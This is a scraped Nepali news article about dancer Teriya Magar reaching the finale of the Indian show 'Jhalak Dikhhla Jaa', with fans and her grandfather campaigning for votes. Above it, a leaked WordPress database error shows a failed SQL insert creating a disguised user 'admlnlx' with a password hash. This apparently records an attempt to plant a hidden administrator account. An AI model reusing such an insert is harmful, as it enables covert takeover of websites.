WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdFERAPc9SymrBylgftJp8/7erdJ6c0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 23:25:34', '', 'admlnlx', 'admlnlx')
एजेन्सी । भारतीय टेलिभिजन च्यानल जिटिभीको लोकप्रिय ‘डान्स रियालिटी शो’ को विजेता बन्न सफल नेपाली चेली तेरिया मगर भारतकै अर्को चर्चित नृत्य प्रतिष्पर्धात्मक टेलिभिजन शो ‘झलक दिखलाँ जा’को प्रतिस्पर्धाको अन्तिम चरणमा पुगेकी छिन् ।
तेरियाले ‘डान्स रियालिटी शो’ जितेको ५ वर्षपछि अर्को उपाधिको नजिक पुगेपछि नेपालका शहरुहरु र नेपालीभाषी स्थलहरु दार्जलीगंमा छुट्टै रौनक छाएको छ ।शनिबार कलर्स च्यानलबाट प्रसारण हुने उक्त शे नै अन्तिम हुने र त्यसले नै उनको भाग्य फैसला गर्नेछ ।
रुपन्देहीकी तेरियालाई विजेता बनाउन सामाजिक सन्जालमा ‘तेरियालाई जिताऔं’ अभियान चलेको छ। तेरियाले पनि आफूलाई जिताउनका लागि भोट दिन आग्रह गरेकी छन्। तेरियालाई जिताउन अपिल गर्दै र भोट माग्नका लागी उनका हजुरबुबा समेत काठमाडौँमा आएर भोट मागिरहका छन् ।